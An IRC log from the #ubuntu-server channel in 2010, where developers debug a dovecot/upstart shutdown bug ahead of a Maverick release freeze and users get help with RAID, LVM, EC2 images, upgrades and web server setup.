<hggdh> zul: I did not _reproduce_, I just found a bypass. I am still at loss on what might have caused it... I was going, now, to reinstall dovecot to see if it triggers the issue
<hggdh> (apt-get --reinstall install dovecot-...)
<zul> hggdh: gotcha
<hggdh> but *both* 'stop dovecot' and 'start dovecot' would hang
<hggdh> zul: proposed on Maverick?
<zul> hggdh: proposed on lucid
<hggdh> zul: I am running Maverick
<zul> k
<zul> hggdh: k im able to reproduce it
<yunosh> hi, i'm trying to pick an iso image when creating a new vm with virt-manager, but the file dialog doesn't show any directories or files
<yunosh> and if i specify the path manually, it doesn't find the media :(
 * zul shakes his fist at upstart
<JamesPage> zul: having fun?
<zul> JamesPage: %$#!$%...no
<RoAk> lol
<hggdh> zul: I have a small issue with upstart: my /tmp fs does not get cleaned on restart. So I run upstart with --debug and... it works...
<hggdh> so: welcome to the group :-)
<zul> hggdh: ?!?!
<hggdh> zul: the group of people surprised by it
<ttx> SpamapS: reping
<ttx> smoser: i'm away Thursday, will you be around to drive the cloud images RC release ?
<smoser> yes.
<smoser> ttx, do you know of any reason not to use today's images for expected RC ?
<smoser> ie, that i can't start testing today ?
<qjcg> the version of lighttpd available (1.4.19-0ubuntu3.1) on Hardy has a bug ( http://redmine.lighttpd.net/issues/897 ) that's causing me problems... aside from doing a dist-upgrade or manually installing a new version of lighttpd, are there any other solutions? I don't think there's a backport of a newer version available...
<ttx> smoser: I'd use the first one generated after the freeze (00:00 UTC tomorrow)
<smoser> ah. ok.
<ttx> smoser: for consistency reasons (RC in cloud images ~= RC in the rest)
<smoser> yeah. definitely.
<ttx> smoser: unless you *know* something introduced today breaks everything :)
<smoser> well, i know, i'm just not telling
<ttx> smoser: good good.
<MTecknology> Any of you know of a good heartbeat system for monitoring server and website uptime?
<SpamapS> ttx: ppppooonnnggggg
<ttx> SpamapS: heeyyy
<ttx> SpamapS: so everything freezes tonight, 00:00 UTC on Tuesday
<SpamapS> ttx: Haven't seen feedback on the apache bug
<ttx> SpamapS: I think your apache proposed fix is a bit too scary at that point, do you concur ?
<ttx> SpamapS: I commented on the BMP
<SpamapS> ttx: drizzle is nearly done
<zul> ttx: http://people.canonical.com/~chucks/dovecot-debdiff.patch
<SpamapS> ttx: yes, I think it needs a good solid review by the security team, though its straight forward enough I think it should be SRU'able if they're comfortable with it.
<ttx> SpamapS: full ack. I'll remove it from release radar
<thesheff17> I need to increase the number of file open handlers for ubuntu 10.04...I have done this for 8.04 but I have a feeling that the /etc/pam.d/common-session session required        pam_limits.so isn't taking...anyone do this for 10.04 yet?
<kinygos> hi...is this the ubuntu server development channel?
<kinygos> i'm looking for help with a support(ish) question on ubuntu server
<kinygos> i heard that ubuntu server 9 is coming to the end of its support lifetime...will it be challenging to upgrade a server running ubuntu 9.04 that's hosting a web application?
<kinygos> i'm about to go live with a new web application, but the hosting company only provides ubuntu 9.04 on their dedicated servers...i'm concerned that if something comes up that forces me to upgrade ubuntu, i'll be stuck as it will be in production and every minute of downtime will be costly
<thesheff17> kinygos: best bet would be to install 9.04 on another server, configure your software, do a dist upgrade and see what happens
<thesheff17> kinygos: don't do it directly on production.
<thesheff17> kinygos: upgrading the os is the easy part..making sure your application still works is the hard part.
<goldcove> Ubuntu JeOS, I'm unable to get programs that segfaults to produce core dumps. I've tried to "ulimit -c unlimited", but this does not come into effect as coredump is stuck at 0. Is there a way to fix this?
<Riddell> jiboumans: how are we looking for starting RC testing tomorrow?
<Datz> Hi, I was wondering what the lastest upgrades were;  linux-headers-2.6.32-25{a} from  linux-headers-2.6.32-24{u}?
<Datz> I don't beleive there is a changelog entry
<mathiaz> ttx: o/ - I'll take the RC release management over
<jdstrand> smoser: hey. this may be a dumb question, but a) what is the most up to date ec2 image for maverick and b) can you point me to the latest/most up to date/relevant wiki page for ec2 and ubuntu?
<smoser> https://help.ubuntu.com/community/EC2StartersGuide is probably the best place to start.
<smoser> it has pointers to maverick images
<uvirtbot> New bug: #645773 in chkrootkit (main) "chkutmp crashed with SIGSEGV in _Unwind_Backtrace()" [Low,Incomplete] https://launchpad.net/bugs/645773
<smoser> which is  	
<smoser> http://uec-images.ubuntu.com/server/maverick/current/
<jdstrand> smoser: perfection. thanks
<smoser> and available programattically from stuff under http://uec-images.ubuntu.com/query/
<smoser> ie: http://uec-images.ubuntu.com/query/maverick/server/daily.current.txt
<zul> mathiaz: ping did you have a look at ttx's email?
<mathiaz> zul: yes
<mathiaz> zul: what's the status of bug 646858
<uvirtbot> Launchpad bug 646858 in dovecot "dovecot-postfix and upstart incompatibility" [High,Confirmed] https://launchpad.net/bugs/646858
<mathiaz> zul: ?
<zul> mathiaz: that debdiff fixes the bug
<zul> and we got confirmation from someone else that it fixes it
<zul> mathiaz: i just want someone to review the debdiff and get an ack
 * mathiaz looks at the bug
<mathiaz> zul: were you able to reproduce the bug?
<zul> mathiaz: yep
<mathiaz> zul: what is the problem?
<zul> mathiaz,: hggdh did as well
<hggdh> yes
<zul> mathiaz: upstart looses track of the pid so it doesnt shutdown
<mathiaz> zul: I'm trying to understand what the problem is in order to check that the patch addresses the correct problem
<mathiaz> zul: is there any debugging traces that the problem with upstart is losing pids?
<zul> mathiaz: thats fine because it does
<zul> mathiaz: no there isnt
<mathiaz> zul: so how do you know that upstart looses track of the pid?
<zul> mathiaz: because when i do a status dovecot it reports the wrong pid
<kinygos> thesheff17: thank you very much for the advice...apologies for the delay, i had a real life issue to deal with :)
<uvirtbot> New bug: #649114 in samba (main) "package winbind 2:3.4.7~dfsg-1ubuntu3.2 failed to install/upgrade: subprocess installed post-installation script returned error exit status 1" [Undecided,New] https://launchpad.net/bugs/649114
<thesheff17> kinygos: np
<mathiaz> zul: do you have any idea why ttx is not able to reproduce the problem?
<mathiaz> zul: hggdh: what is different in your environement?
<zul> mathiaz: no..but to reproduce it i had to set the postfix to local configuration
<zul> mathiaz: its possible he didnt have postfix configured
<mathiaz> zul: I think the debdiff is correct. Given that where we are in the release cycle (about to enter RC freeze) I'd like to make *sure* the patch is actually correct
<mathiaz> zul: and not a shot in the dark like... hm it seems to work
<mathiaz> zul: to do so I'd like to fully understand what the problem is
<mathiaz> zul: and prove that the patch is addressing the issue
<zul> mathiaz: go ahead ill be waiting :)
<hggdh> mathiaz: I do not run postfix
<mathiaz> zul: hggdh: could you outline a specific configuration that shows the problem?
<mathiaz> and then start upstart in debug mode to figure out why it gets stuck?
<zul> mathiaz: sure configure postfix to be a local in lucid and upgrade to maverick
<mathiaz> hggdh: is your setup easier?
<mathiaz> hggdh: is it an upgrade from lucid as well?
<hggdh> mathiaz: no, I was already in maverick, running a dist-upgrade that included dovecot
<mathiaz> hggdh: do you have postfix installed in the system that show cased the bug?
<hggdh> mathiaz: just confirmed, I do have it, for local delivery
<mathiaz> hggdh: is dovecot-postfix installed?
<hggdh> mathiaz: no
<mathiaz> hggdh: is dovecot configured to use SASL?
<hggdh> mathiaz: no. Active dovecot config: http://pastebin.com/TXRnHh1L
<ziarkaen> As .img files are not produced any more, what is the best way to install latest server edition via USB?
<mathiaz> ziarkaen: you can create bootable usb drive with usb-creator
<mathiaz> ziarkaen: and a -server iso
<ziarkaen> Sorry, I'm not running Ubuntu; I'm using another distro.
<ziarkaen> Is that utility released as source tarball?
<mathiaz> zul: nope
<mathiaz> zul: I haven't reproduce the issue yet
<mathiaz> zul: could you start up a test system that is not working and turn upstart debug on?
<mathiaz> zul: the goal is to check why dovecot fails to restart
<zul> mathiaz: sure but you should able to do a sudo start dovecot and then sudo stop dovecot as well to reproduce it
<mathiaz> zul: well - I tried - and it works as expected
<zul> mathiaz: did you have postfix-dovecot installed?
<mathiaz> zul: yes - I've install dovecot-postfix
<zul> from lucid?
<mathiaz> zul: note that this is a brand new maverick install
<RoyK> mathiaz: heh - you're playing with fire
<zul> mathiaz: please try the upgrade from lucid with dovecot-postfix installed and postfix configured
<mathiaz> hggdh: is your system also an upgrade from lucid?
<mathiaz> hggdh: is your *dovecot* system also an upgrade from lucid?
<mathiaz> zul: could you compare your lucid dovecot configuration to maverick configuration?
<mathiaz> zul: in /etc/dovecot/ ?
<mathiaz> zul: there may be a change during the upgrade?
<zul> mathiaz: yes it prompted for a chance
<zul> change even
<mathiaz> zul: so the old configuration files should be laying around on the upgraded system
<mathiaz> zul: as .dpkg-{old, new}
<mathiaz> zul: what has changed?
<zul> mathiaz: just a sec
<hggdh> mathiaz: yes, I upgraded it from Lucid some 3 months ago
<mathiaz> hggdh: ok
<hggdh> mathiaz: and I had to hand-stitch the Lucid config for Maverick
<zul> mathiaz: http://paste.ubuntu.com/501671/
<mathiaz> zul: what's the content of include_try /etc/dovecot/auth.d/*.auth
<mathiaz> zul: ?
<zul> http://paste.ubuntu.com/501675/
<mathiaz> zul: and include_try /etc/dovecot/conf.d/*.conf
<mathiaz> zul: ?
<zul> http://paste.ubuntu.com/501677/
<holstein> ziarkaen: http://www.revouser.com/forum/viewtopic.php?f=7&t=794
<holstein> ^^ is that helpful...
<uvirtbot> holstein: Error: "^" is not a valid command.
<ziarkaen> holstein, That seems like a specific installation problem; I'm more after an official method to install ubuntu-server from another distro with usb.
<holstein> ziarkaen: can you use unetbootin on that distro?
<ziarkaen> holstein, Yes.
<holstein> i havent tried it personally, but i have suggested it with the ubuntustudio iso
<holstein> another alternate installer
<holstein> and i was told it worked
<ziarkaen> holstein, Thanks.
<jdstrand> smoser: last question. looking at http://uec-images.ubuntu.com/query/lucid/desktop/daily.current.txt I see 'ebs' and 'instance-store'. what is the difference? (I know ebs is elastic block storage, but don't know what that means in the report)
<smoser> https://help.ubuntu.com/community/UEC/Images has a *little* more info on what you can find there.
<smoser> but basically that is the 'root store' . there are two types of instances, ebs root and instance-store.
<smoser> ebs root has root filesystem on a ebs volume
<jdstrand> that is what I was thinking
<smoser> instance-store has root filesystem on the instance store (ie, when system goes away, so does the root fs)
<jdstrand> smoser: so ebs is going to be more expensive?
<smoser> you pay 10 cents per GB/Month of provisioned storage
<smoser> and you pay per IO ops also onto ebs
<jdstrand> k
<smoser> so, yes, it will be $1.50 / month + IO ops
<jdstrand> smoser: thanks again
<jdstrand> smoser: hrm:
<jdstrand> ec2-run-instances ami-4ef9a80b -k ec2-keypair -t c1.xlarge
<jdstrand> Client.InvalidAMIID.NotFound: The AMI ID 'ami-4ef9a80b' does not exist
<smoser> that is in us-west-1
<smoser> ec2-run-instances -region us-west-1 <....>
<jdstrand> ah
<jdstrand> I didn't see that in https://help.ubuntu.com/community/EC2StartersGuide
<smoser> --region
<smoser> (i missed a -)
<smoser> http://uec-images.ubuntu.com/server/maverick/current/ has cut and paste lines
<smoser> i think that SpamapS has some "launch latest" scripts
<jdstrand> thanks
<smoser> but he hides them from me
<zul> smoser: because you are not apart of the secret society...besides you have to show the dance
<mathiaz> zul: ok - I'm able to reproduce bug 646858
<uvirtbot> Launchpad bug 646858 in dovecot "dovecot-postfix and upstart incompatibility" [High,Confirmed] https://launchpad.net/bugs/646858
<mathiaz> zul: the problem seems triggered by managesieve
<mathiaz> zul: without managesieve dovecot doesn't spawn an extra process and upstart is able to keep track of it
<uvirtbot> New bug: #649189 in samba (main) "Samba fails to bind IPv6 on boot" [Undecided,New] https://launchpad.net/bugs/649189
<zul> mathiaz: acked
<mathiaz> zul: with managesieve enabled dovecot spawns another process and upstart looses track of it
<zul> mathiaz: have you tried the debdiff?
<overlord_tm> Is it possible to kickstart lucid install with lvm on sw raid, or i have to use preseed?
<mathiaz> zul: the debdiff looks good - please go ahead with the upload
<zul> mathiaz: thanks
<heyblondie> After installing LAMP, I would like apache to use a www directory on and ntfs partition as the webroot directory. Is that possible?
<hggdh> is bug 648202 something we should consider for Maverick? I personally do not think so, but...
<uvirtbot> Launchpad bug 648202 in vsftpd "vsftpd started even if not in standalone mode" [Low,Confirmed] https://launchpad.net/bugs/648202
<zul> mathiaz: thanks
<heyblondie> help with apache configuration anyone, or should I be in another channel?
<billybigrigger> heyblondie, your config is possible
<RoyK> (s)he left
<mathiaz> SpamapS: hi - are you working on the drizzle FTBS?
<mathiaz> Daviey: hey!
<mathiaz> Daviey: any news on bug 644733?
<uvirtbot> Launchpad bug 644733 in eucalyptus "On upgrade from Lucid to Maverick CC entries in /etc/eucalyptus/eucalyptus.local.conf are commented out" [High,Confirmed] https://launchpad.net/bugs/644733
<Daviey> mathiaz, working on it atm
<mathiaz> Daviey: great - will you need sponsoring?
<Daviey> mathiaz, aye
<Daviey> mathiaz, Well actually, right now... i'm trying to sort out a db schema issue
 * mathiaz guesses it means yes?
<Daviey> heh
<mathiaz> Daviey: I'll be offline for a few hours
<Daviey> mathiaz, ok
<mathiaz> Daviey: I should be back a couple of hours before the freeze is in effect
<mathiaz> Daviey: which is at 00:00 UTC
<Daviey> mathiaz, cool
<Daviey> yeah
<jdstrand> smoser: ok, so I finally got an image started. I can't ssh, so I looked at the console and see: http://paste.ubuntu.com/501737/
<jdstrand> smoser: is this known?
<jdstrand> smoser: this is ami-f8638991
<smoser> bug 613273
<uvirtbot> Launchpad bug 613273 in linux "kernel panic on ec2 in system_call_fastpath" [Medium,Confirmed] https://launchpad.net/bugs/613273
<smoser> restart it
<smoser> ec2 reboot-instances <instance-id>
<jdstrand> smoser: should I just do that until it comes up?
<smoser> it should come up next time
<max2> hey all i'm having an issue with raid45 - i keep getting : "raid45" is not in the kernel - how can i fix this so my raid5 works? thanks - im installing ubuntu server 10 amd64
<jdstrand> smoser: yes, it did. I got confused for a second forgetting that the console is not updated immediately
<ChmEarl> max2, do you want to use mdmonitor and software raid? or do you have an onboard fakeraid chip?
<max2> <ChmEarl> I have an intel board with SATA Raid - and 3x 1GB drives
<smoser> jdstrand, yeah, thats a pita
<jdstrand> smoser: sorry about me being a pita-- it's been a little while since I cranked up an instance :)
<max2> in the raid bio config i setup a RAID5 for the 3 drives - but i keep getting "is not in the kernel" error
<ChmEarl> max2, then lucid-server might be missing the dmraid
<max2> http://forums.citrix.com/message.jspa?messageID=1016922
<smoser> jdstrand, no problem.
<max2> its a bug that has been an issue for over 2 years
<JavaAtom> Similar question -- can I put together a software raid (via mdadm) and use multiple hard drives + a partition that is slightly smaller without reducing the usage of each disk to the smaller size?
<ChmEarl> raid45 is the dmraid stuff
<ChmEarl> max2, try the alternate CD
<max2> <ChmEarl> why? i just got this iso off the site
<_ruben> JavaAtom: only when using raid0 (which isnt really raid)
<max2> its the only x64 iso avail
<JavaAtom> _ruben: So I can't do a raid-5 of sorts like that?
<_ruben> JavaAtom: raid1/5/10/etc all require equal sized members
<JavaAtom> _ruben: ahhhh shazbot.
<_ruben> JavaAtom: and thus will use the largest *common* size available
<JavaAtom> well, dropping 30G off of each 1TB drive isn't *too* bad, you think?
<JavaAtom> (I've got six drives)
<max2> no one knows how to get raid5 working?
<_ruben> JavaAtom: why would you chop off a part of only 1 disk?
<_ruben> max2: unless you plan to dual boot with windows or something similar, forget about the raid bios and go with plain software raid (mdadm) instead
<JavaAtom> _ruben: because one of the discs has a normal partition scheme (within about 30GB) and then the rest was used for an LVM partition, which got lumped together with five other 1TB drives to give nearly 6TB of usable space.
<max2> <_ruben> so how should my STAT drives be setup then?
<JavaAtom> _ruben: I'd like to use the remaining 900GB on that first disk without installing the whole OS to the raid.
<max2> isnt hardware raid better then software raid?
<_ruben> max2: fakeraid isnt hardware raid
<JavaAtom> max2: It's supposed to be, but software raid can do interesting things.
<max2> why will raid5 not work?
<_ruben> hardware raid >> software raid >> fakeraid
<max2> ?
<_ruben> dunno, never cared for fakeraid myself
<_ruben> software raid tends to outperform it easily
<max2> so i should just set my raid sata drives as notmal drives and use LVM?
<JavaAtom> hah. I just had a drive fail on that setup <re max2>
<_ruben> JavaAtom: personally i'd go for creating 2 raid volumes, one for os, one for storage, or just one big one, and carve up using lvm for both os and data
<max2> i just want to use raid5 with linux
<max2> why is that so hard
<max2> this sucks
<_ruben> max2: lvm has nothing to do with this
<Norkakn> Hi, I have an md RAID 10, with one disk that drops because of bad blocks.  is there a way to use badblocks or something to get it to just map out the bad ones until we can replace the disk?
<_ruben> software raid can do raid5 just fine
<_ruben> my home fileserver has software raid5 over 6 1tb disks
<JavaAtom> max2: See, the complaints don't help. "This sucks" is counterproductive and generally makes people like myself unhelpful.
<max2> sorry
<max2> im just frustrated because this has been a bug for years
<JavaAtom> max2: No worries. I feel your frustration.
<_ruben> max2: configure bios as normal sata disks, and in ubuntu server installer configure the software raid, and then lvm on top of the software raid
<JavaAtom> _ruben: Maybe I can do what you just suggested to max2...
<_ruben> max2: the real bug is hardware vendors still shipping fakeraid chipsets
<max2> so i should set all my disks to "non-raid"
<_ruben> max2: yes
<_ruben> max2: and then let the os (ubuntu) do the raid part
<max2> okay ill do that
<_ruben> easier to maintain, and most likely better performance as well
<_ruben> Norkakn: not that im aware of, i'd just pull the disk and get a replacement asap
<Norkakn> _ruben: thanks.  I remember them thinking about adding support for it, but I'm not seeing anything about it going live
<_ruben> Norkakn: ic, i must admit i dont follow the software raid (mdadm) development very closely
<_ruben> ugh .. writing ip addressing schemes is a pita .. ipv4: too little ip addresses .. ipv6: too much ip addresses :p
<JavaAtom> _ruben: heh -- I'm in the middle of a migration from 192.168.0.0/24 to a 10.72.0.0/16
<_ruben> JavaAtom: smart move :)
<_ruben> cant wait to get rid of our 10.0.0.0/24 .. it's almost as bad as using 192.168.{0.1}.0/24 ;)
<JavaAtom> _ruben: Yeah, well, when you have 8 ip addresses free and you hire three people... that should throw up some flags. :P
<_ruben> haha
<JavaAtom> ah hell, what's the netmask 255.255.0.0 end up being?
<JavaAtom> slash-something?
<_ruben> that'd be /16
<JavaAtom> ah, that's what I thought.
 * RoyK renicks failover to fallover
<failover> \o/
<max2> so is it a good idea to use LVM with software raid5?
<_ruben> max2: i'd say it is
<_ruben> it adds a layer of flexibility
<_ruben> (back in the day one couldnt partition mdadm volumes, so it was either building a lot of arrays, or use lvm to carve up an array)
<max2> so i setup my software raid5 and then setup lvm
<_ruben> that's what i tend to do, yes
<_ruben> grub1 (not sure about grub2) cant have /boot on lvm though, i also tend to create a seperate raid volume for /boot (without lvm)
<sourcemaker_> is there a good wiki how to install and setup PROCMAIL + IMAP + FETCHMAIL?
<max2> should i include all my partitions in my lvm group?
<fluvvell> can anyone clarify when chrooting, when is it necessary to mount /dev/ and /dev/pts and /sys  : I've been doing this but can't remember why.
<fluvvell> I should add that the tree I'm chrooting to is a full system.
<dominicdinada> how to add a git repository for some reason i keep getting failed to initialize
<dominicdinada> http://ubuntuforums.org/showthread.php?t=786095
<dominicdinada> for following these instructions
<thesheff17> dominicdinada: http://pthree.org/2008/11/28/setup-a-git-repository/
<thesheff17> dominicdinada: that how to has worked really well for me.
<dominicdinada> thesheff17: thanks for the info i got git-core etc already
<jeeves_Moss> I know Ubuntu's ruby package is messed, but I can't remember the work around for this error.  anyone?  http://pastebin.ca/1949976
#ubuntu-server 2010-09-28
<Daviey> hggdh, A new euca is landing shortly...  upgrade issues fixed
<hggdh> Daviey: awsome! And... I guess there I go back to Lucid ;-)
<dominicdinada> efffin finally
<Daviey> hggdh, I've been doing it all day - so i do sympathise :)
<dominicdinada> so the kernel they tried pushing out today was bad ?
<Daviey> dominicdinada, huh?
<dominicdinada> i was wondering if the update today was a bad kernel
<jeeves_Moss> I know Ubuntu's ruby package is messed, but I can't remember the work around for this error.  anyone?  http://pastebin.ca/1949976
<uvirtbot> New bug: #649423 in vsftpd (main) "package vsftpd 2.2.2-3ubuntu6 failed to install/upgrade: le sous-processus script post-installation installÃ© a retournÃ© une erreur de sortie d'Ã©tat 1" [Undecided,New] https://launchpad.net/bugs/649423
<osmosis> I used to use ubuntu kvm virtualization on hardy, and ran win2k3 instances for a long time with no issues. I have tried everything, and am unable to create a stable win2k3 instance on ubuntu lucid. nothing else i can thing of to try, and i found no specific cause, it just doesnt work. runs unusably slow and throws errors.
<osmosis> kirkland, if you have any ideas for how I could troubleshoot win2k3 kvm failures on lucid that would be great and maybe I could make a bug. Im out of ideas, and dont know the cause.
<Aliv3> hi
<Aliv3> im not a troll
<Callum__> ugh
<Callum__> anyone know how to do subdomains in Apache?
<Callum__> I've set my A record for the subdomain with my domain name supplier, but Apache isn't co-operating with making the subdomain >_>
<Aliv3> i want to setup my server for httpd file and database
<Aliv3> what do i choose
<twb`> Aliv3: define "httpd file and database"
<Aliv3> web server
<Aliv3> file server
<Aliv3> mysql
<Aliv3> but i dont know the aliases, it has funny names for them on ubuntu server
<twb`> Have you read the Ubuntu Server Guide?
<tgies> those are the names of the actual software packages that provide those services
<tgies> "web server" is a type of service, "apache" is a particular web server application
<tgies> as for file server, do you mean, like, ftp?
<tgies> most people use apache2 and proftpd for web and ftp respectively. i would second that you should take a look at the server guide though
<ksx4system> vsftpd FTW
<tgies> ksx4system: :D yeah, that's what I use
<tgies> proftpd seems to be the most popular choice though, probably b/c you can get it to do more stupid tricks out of the box
<tgies> it might be better for like a complex shared web hosting server environment
<tgies> it certainly isn't bad
<Aliv3> and whats a DNS server do
<Aliv3> can i like make up a tld and let ppl register or something
<ksx4system> imvho BIND9 sucks balls, MaraDNS FTW (easier to configure, less resource hungry)
<Aliv3> like it gives me these options:
<twb> I use dnsmasq, FWIW.
<twb> Er, for a recursive resolver -- not for hosting my own records.
<Aliv3> [ ] DNS server
<Aliv3> [ ] LAMP server
<Aliv3> [ ] Mail server
<Aliv3> [ ] OpenSSH server
<Aliv3> [ ] PostgreSQL database
<Aliv3> [ ] Print server
<Aliv3> [ ] Samba file server
<Aliv3> [ ] Tomcat Java server
<Aliv3> [ ] Virtual Machine host
<Aliv3> [ ] Manual package selection
<twb> !paste
<ubottu> For posting multi-line texts into the channel, please use http://paste.ubuntu.com | To post !screenshots use http://tinyurl.com/imagebin | !pastebinit to paste directly from command line | Make sure you give us the URL for your paste - see also the channel topic.
<uvirtbot> New bug: #649495 in bind9 (main) "package bind9 1:9.7.0.dfsg.P1-1 [modified: usr/share/bind9/bind9-default.md5sum] failed to install/upgrade: subprocess installed post-installation script returned error exit status 1" [Undecided,New] https://launchpad.net/bugs/649495
<arrrghhh> anybody have experience with ps3mediaserver or transcoding?
<Error404NotFound> a good ubuntu based rescue disk, whats your recommendation?
<fluvvell> All ubuntu disks are rescue disks, what are you rescuing ?
<Error404NotFound> i need some more out of box, i don't want to install anything :)
<fluvvell> do you have a network or an external drive to put your "more" into ?
<fluvvell> Ubuntu live disks have both install and live modes. Just use the live mode.
<twb> IMO ubuntu desktop CDs make shitty rescue discs, because they don't have stuff like lvm and mdadm pre-installed
<lincoln> Hey, I'm wanting to host some small webspace from my house, half to be useful, half to just learn about setting up a server, but first, how to I tell if my ISP has blocked port 80??
<twb> lincoln: netcat listen to port 80 from inside, and make a request to 80 from outside
<lincoln> how do I get "outside" though? that's my question.  Can I simply do it from another computer inside my network?
<twb> lincoln: ssh into ubuntu.com or so
<twb> I'm assuming that as a sysadmin you already have an account SOMEWHERE
<lincoln> I'm no sysadmin, just a dude
<lincoln> haha
<twb> try http://en.wikipedia.org/wiki/SDF_Public_Access_Unix_System
<twb> http://en.wikipedia.org/wiki/Shell_provider contains lists of other providers in the "external links" section.
<twb> I tend to use alioth.debian.org or code.haskell.org or one of my customers' hosts.
<lincoln> twb: okay awesome, thanks
<Error404NotFound> twb, agreed about live CDs being shitty rescue CDs point, thats exactly what i am looking for.
<Error404NotFound> something out of box, ubuntu based, have basic data forensics, network forensics tools installed
<twb> Historically I use either Knoppix or CentOS live CDs.
<Error404NotFound> support for more fs out of box like xfs
<twb> Lately I have been using hand-rolled or pre-rolled Debian Live rescue images.
<twb> forensics is a different rÃ´le to rescue
<Error404NotFound> i have been tempted for http://ubuntu-rescue-remix.org/ and http://grml.org
<Error404NotFound> somehow i am biased towards grml here :)
<uvirtbot> New bug: #649559 in postfix (main) "package postfix 2.7.0-1 failed to install/upgrade: subprocess installed post-installation script returned error exit status 75" [Undecided,New] https://launchpad.net/bugs/649559
<fluvvell> twb, Error404NotFound, that will teach me for responding before checking which channel I'm on.  I use a boot usb with custom stuff installed for server work.  duh.
<twb> fluvvell: no worries.
<uvirtbot> New bug: #649574 in dovecot (main) "dovecot-postfix incomplete install" [Undecided,New] https://launchpad.net/bugs/649574
<smoser> ttx, ping
<smoser> https://bugs.launchpad.net/ubuntu/+source/mountall/+bug/649591
<uvirtbot> Launchpad bug 649591 in mountall "mountall spins eating cpu when 'nobootwait' option exists in fstab" [Critical,Confirmed]
<smoser> ttx, I have to get to bed. but i'd really appreciate a ping to Keybuk or someone who could look at that bug.
<smoser> ttx, you shuld have access to ubuntu@ec2-184-72-166-196.compute-1.amazonaws.com, but the bug reproduces on reboot of instance of type m1.small of recent maverick.
<sander^work> Anyone know about the marvin backported kernel for 10.04?
<sander^work> http://pastebin.com/e8RRyxUW <-- When I try to add it, I still can't find the package, getting #
<sander^work> W: Failed to fetch http://ppa.launchpad.net/kernel-ppa/ppa/ubuntu/dists/karmic/main/binary-amd64/Packages.gz  403  Forbidden
<twb> mountall is totally broken
<twb> I hope the whole thing is gone by 12.04
<sander^work> Why does apt-get update give me that error message, but not aptitute update ?
<sander^work> aptitude
<twb> sander^work: because in the mean time, someone deleted the file from the server
<sander^work> twb, who to contact to get it fixed?
<twb> Whoever the PPA belongs to, I suppose
<twb> Try #launchpad or #ubuntu-kernel?
<sander^work> Ok.. thanks.
<overlord_tm> Any idea how to mount virtual machine disk (it is logical volume, not image file) in host system?
<twb> overlord_tm: you mean that it's an LVM LV?
<overlord_tm> yes
<twb> mount /dev/mapper/foo-bar /mnt
<twb> If your virtual disk is partitioned, you'll need an -ooffset=N, where N can be obtained by running fdisk -l (or so) on the device
<twb> Typically something like 63 Ã the block offset.
<overlord_tm> twb, it says that i have to pass filesystem :/ it is ntfs drive of win 2k3 machine
<twb> So you probably have a partition table on the virtual disk
<overlord_tm> fdisk says there is no valid partition table
<twb> What does file -s say?
<overlord_tm> root@mru-server:/home/mru# file -s /dev/mapper/vg_mru-sql--server
<overlord_tm> /dev/mapper/vg_mru-sql--server: Qemu Image, Format: Qcow , Version: 2
<twb> Ah, OK.  It's not a raw disk, it's a qcow2 image.
<twb> You can't mount it unless you convert it into a raw disk using qemu-img(1).  Note that this will consume 100% of the virtual disk's size on your host system, in addition to whatever the LVM LV already consumes.
<overlord_tm> ok, what parameters do i have to pass to virt-install to use raw image?
<twb> I don't know.  I don't use silly wrappers like libvirt.
<overlord_tm> that are broken in lucid :)
<kinygos> good morning all...i'm trying to upgrade ubuntu server 9.04 to 10.04LTS. i first upgraded to 9.10, then attempted to go to 10.04LTS and hit an error that aborted the upgrade.  hunting round the forums, it appears "the problem is caused by a feature in apt that tries to ensure that all important packages get configured immediately to minimise risks if something goes wrong"....
<kinygos> so, the workaround i'm trying to use is to manually change to lucid, get the 64bit version of the latest lucid mountall, then force mountall to install without the dependencies...
<kinygos> my problem is, i don't know which is the latest lucid mountall version...can anyone help?  is it 2.15.2?
<twb> kinygos: ask rmadison(1)
<twb> $ rmadison -uubuntu -slucid mountall ==> mountall | 2.14 | lucid | source, amd64, i386
<kinygos> twb: thank you very much for the quick reply :)
<daffy_dowden> Anyone got any experience with Ruby hosting? specifically with RVM and Passenger?
<twb> Not me.  #ruby or #ruby-<something> might be a better place to ask about that
<daffy_dowden> ok, fair enough
<twb> By all means wait around here for an answer, too
<daffy_dowden> One other question. If I'd like to add an openlikewise user to a group, do I need to include a double \ instead of a single \ because of the domain?
<daffy_dowden> ...if that makes sense
<twb> Never heard of "openlikewise"
<daffy_dowden> ok. It's for authentication against active directory
<twb> It looks like a proprietary LDAP client
<twb> #ubuntu-server will probably only provide support for the PADL LDAP client that ships with Ubuntu.
<twb> (AD is basically Kerberized LDAP.)
<daffy_dowden> ok cool. Out of interest, would PADL do a similar thing?
<twb> AFAIK PADL can talk to AD, though I've never tried it myself.
<daffy_dowden> sound like it'd probably be a headache making the switch anyway
<twb> Shrug
<twb> IME LDAP and krb are *always* a headache
<daffy_dowden> lol, true
<twb> Unfortunately nothing else (except NIS) is available, and NIS is a non-starter for networks that have users on them
<twb> And now for IPv6 it looks like I need to learn ipsec, too, which I've been avoiding... :-(
<daffy_dowden> I'll be honest with you. Most of that went over my head, other than a few buzzwords - mainly IPv6 and ipsec
<daffy_dowden> I'm a dev first and a lousy admin second
<_ruben> ipsec isnt all that bad once you get your head around it ;)
<rebirth> i've installed these packages: apache2 php5-mysql libapache2-mod-php5 mysql-server. how do i begin developing a web site. yes i know php and mysql but have only developed on a windows system.
<twb> rebirth: AFAIK PHP and SQL aren't any different on Unix.
<_Techie_> theyre exactly the same
<_Techie_> the only thing that differs is your editor
<twb> _Techie_: emacs works on Windows :P
<_Techie_> twb, dont get smart with me
<rebirth> ok, then what is a good editor to use on ubuntu? i used PSPad in windows.
<twb> rebirth: if PSPad includes transparent SFTP support, you could continue using it
<_Techie_> or you could get really tricky and actualy make changes then upload the file
<twb> rebirth: "programmers" tend to use vim or emacs, with comparatively negligible contingents using other random stuff like kedit and joe.
<rebirth> i don't see it in the software ceneter, also, i'm not attached to it and open to suggestions for the best software to use in ubuntu
<twb> I guess these days there's a non-negligible group of people who have machines powerful enough to run Eclipse or jEdit without OOMing
<twb> rebirth: you shouldn't be running a GUI on your server
<rebirth> Eclipse hmm
<_Techie_> i suggest nano, but thats mainly because i like being a complete asshat
<twb> nano is certainly a good choice of *first* editor.
<_Techie_> twb, i still use it for working on servers
<rebirth> does it do syntax highlighting?
<_Techie_> nope
<rebirth> i want something with syntax highlighting
<twb> nano has syntax highlighting
<twb> It's pretty shitty, though, even compared to the weak-ass lexical highlighting of vim or emacs
<rebirth> is vim console based?
<twb> (REAL editors parse code properly to highlight it, raargh!)
<twb> Both vim and Emacs have tty and GUI versions.
<twb> The GUI versions are basically some menus and toolbars around the tty versions
